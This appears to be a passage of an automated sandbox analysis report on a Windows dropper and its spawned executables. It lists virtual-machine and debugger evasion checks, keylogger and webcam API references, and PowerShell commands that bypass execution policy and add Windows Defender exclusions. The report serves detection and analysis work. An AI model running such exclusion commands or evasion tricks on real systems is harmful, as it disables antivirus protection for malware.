                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                            Malware Analysis System Evasion

                            barindex
                            Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeMemory allocated: 12E0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeMemory allocated: 2BE0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeMemory allocated: 4BE0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeMemory allocated: BE0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeMemory allocated: 1A6F0000 memory reserve | memory write watchJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeWindow / User API: threadDelayed 3751Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeWindow / User API: threadDelayed 5426Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeWindow / User API: threadDelayed 473Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeWindow / User API: threadDelayed 9360Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5069
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4757
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7557
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2006
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-19130
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-21574
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe TID: 7680Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe TID: 6936Thread sleep time: -30000s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe TID: 6792Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe TID: 8152Thread sleep time: -922337203685477s >= -30000sJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7500Thread sleep time: -2767011611056431s >= -30000s
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7808Thread sleep count: 7557 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7808Thread sleep count: 2006 > 30
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7832Thread sleep time: -3689348814741908s >= -30000s
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_00409396 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00409396
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_0040DD0E SendDlgItemMessageW,DestroyIcon,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SHGetFileInfoW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0040DD0E
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: wjoqZlIS.exe, 00000002.00000002.1813715305.0000000000F7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllz
                            Source: YsrQekGS.exe, 00000004.00000002.2937204022.000000001B7D4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess information queried: ProcessInformationJump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_0041E48E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041E48E
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_004254C5 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_004254C5
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess token adjusted: DebugJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_0042327E SetUnhandledExceptionFilter,0_2_0042327E
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_0041E48E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041E48E
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_00423D39 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,0_2_00423D39
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_0041FD8B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041FD8B
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeCode function: 1_2_00007FF630CE1890 SetUnhandledExceptionFilter,1_2_00007FF630CE1890
                            Source: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exeCode function: 1_2_00007FF630CE1240 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00007FF630CE1240
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeMemory allocated: page read and write | page guardJump to behavior

                            HIPS / PFW / Operating System Protection Evasion

                            barindex
                            .NET source code references suspicious native API functions
                            Source: wjoqZlIS.exe.0.dr, NativeHelper.csReference to suspicious API methods: LoadLibrary("kernel32")
                            Source: wjoqZlIS.exe.0.dr, NativeHelper.csReference to suspicious API methods: GetProcAddress(hModule, "GetConsoleWindow")
                            Source: YsrQekGS.exe.0.dr, Messages.csReference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
                            Source: YsrQekGS.exe.0.dr, XLogger.csReference to suspicious API methods: MapVirtualKey(vkCode, 0u)
                            Adds a directory exclusion to Windows Defender
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe'
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe'Jump to behavior
                            Bypasses PowerShell execution policy
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe'
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeProcess created: C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe "C:\Users\user\AppData\Local\Temp\rKPaQokQ.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeProcess created: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe "C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeProcess created: C:\Users\user\AppData\Local\Temp\YsrQekGS.exe "C:\Users\user\AppData\Local\Temp\YsrQekGS.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\YsrQekGS.exe'Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\YsrQekGS.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'YsrQekGS.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: 0_2_0040C904 cpuid 0_2_0040C904
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_0040D007
                            Source: C:\Users\user\Desktop\Ekpb7jn7mf.exeCode function: GetLocaleInfoA,0_2_00425CA0
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeQueries volume information: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exe VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\wjoqZlIS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
